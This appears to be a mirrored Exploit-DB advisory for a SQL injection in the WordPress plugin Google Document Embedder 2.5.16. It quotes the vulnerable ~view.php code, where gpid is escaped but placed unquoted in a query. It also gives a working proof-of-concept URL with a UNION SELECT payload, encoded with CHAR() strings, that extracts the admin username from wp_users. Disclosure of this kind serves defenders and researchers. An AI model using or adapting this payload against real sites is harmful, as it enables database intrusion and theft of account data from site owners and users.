WordPress Plugin Google Document Embedder 2.5.16 – ‘mysql_real_escpae_string’ Bypass SQL Injection - 体验盒子

作者： Securely (Yoo Hee man)

日期： 2014-12-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/35447/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection

Data : 2014 – 12 -03

Exploit Author : Securely (Yoo Hee man)

Plugin : google-document-embedder

Fixed version : N/A

Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip

1. Detail

- Google Document Embedder v2.5.14 have SQL Injection

- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.

- but mysql_real_escape_string() function is bypass possible

- vulnerability file : /google-document-embedder/~view.php

================================================================

50 // get profile

51 if ( isset( $_GET['gpid'] ) ) {

52 $gpid = mysql_real_escape_string( $_GET['gpid'] );

//mysql_real_escape_string() is bypass

53 if ( $profile = gde_get_profile( $gpid ) ) {

54 $tb = $profile['tb_flags'];

55 $vw = $profile['vw_flags'];

56 $bg = $profile['vw_bgcolor'];

57 $css = $profile['vw_css'];

58 }

59 }

================================================================

===============================================================

373 function gde_get_profile( $id ) {

374 global $wpdb;

375 $table = $wpdb->prefix . 'gde_profiles';

376

377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE

profile_id = $id", ARRAY_A );

378 $profile = unserialize($profile[0]['profile_data']);

379

380 if ( is_array($profile) ) {

381 return $profile;

382 } else {

383 return false;

384 }

385 }

================================================================

2. POC

http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1

3. Solution:

Not patched

4. Discovered By : Securely(Yoo Hee man)

God2zuzu@naver.com